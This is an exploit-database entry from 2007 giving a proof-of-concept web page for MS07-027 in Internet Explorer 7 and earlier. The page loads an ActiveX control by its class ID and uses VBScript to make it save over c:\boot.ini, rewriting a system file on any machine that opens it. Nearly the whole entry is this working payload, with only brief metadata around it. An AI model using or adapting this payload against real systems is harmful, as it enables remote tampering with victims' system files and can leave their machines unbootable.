MS Internet Explorer <= 7 Remote Arbitrary File Rewrite PoC (MS07-027)

2007-05-10T00:00:00
ID 1337DAY-ID-8921
Type zdt
Reporter Andres Tarasco
Modified 2007-05-10T00:00:00

Description

Exploit for unknown platform in category remote exploits

                                        
                                            ======================================================================
MS Internet Explorer <= 7 Remote Arbitrary File Rewrite PoC (MS07-027)
======================================================================

<html>
<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
<body>

<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0"> 

</OBJECT>
<script language="vbscript">
//next script is converted to UTF16
 target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
 target.SessionAuthor="Andres Tarasco Acuna"
 target.SessionEmailContact="atarasco_at_gmail.com"
 target.SessionURL="http://www.514.es"
 target.SaveAs "c:\boot.ini"
</script>

</body>
</html>



#  0day.today [2018-01-04]  #